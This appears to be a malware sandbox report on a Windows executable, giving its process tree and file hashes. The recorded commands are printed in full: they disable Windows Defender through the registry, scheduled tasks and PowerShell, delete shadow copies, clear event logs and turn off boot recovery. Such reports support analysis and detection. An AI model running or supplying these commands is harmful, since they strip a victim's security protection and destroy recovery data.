16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2980 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3692 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3692 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3656 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3656 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 1876 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 1876 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2396 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2396 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3096 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3096 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 1624 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 1624 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 2176 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 2176 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 3800 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 3800 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 1536 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 1536 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 3168 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe PID 3224 wrote to memory of 3168 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3708
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2912
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1764
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3548
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1216
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1440
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2248
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2388
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12e21" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12e21" /y3⤵PID:1996
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2576
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2460
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:3220
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2980
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3692
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:3656
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1876
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2396
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12e21" start= disabled2⤵PID:3096
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1624
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2176
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3800
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1536
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3168
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4036
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2084
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1604
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3144
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2596
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:704
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:948
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2516
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1328
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1476
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1852
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3920
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3900
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3564
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3504
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3552
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:868
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3028
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1464
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2644 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1628 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3700 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:692
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:428
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:640
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3960 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1916
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1680 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3912 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3680 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3228
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2764 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2564 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
61c94667382d350f800effcc617528b5
SHA10582550f8c9b282eda95a57ea959bd62932f7639
SHA256101da57e1e46a8aec4956ce3dc38bd69166216aa100a27bfc540a308dc01a972
SHA512e6ab33d976ceb11b629988205bb372c4cafb76cd96999d64086fdbce90f3aaf377d1c83e784e290207cd6285e14b6c0a1a1eabf91050c5046966b8e53fba0aaf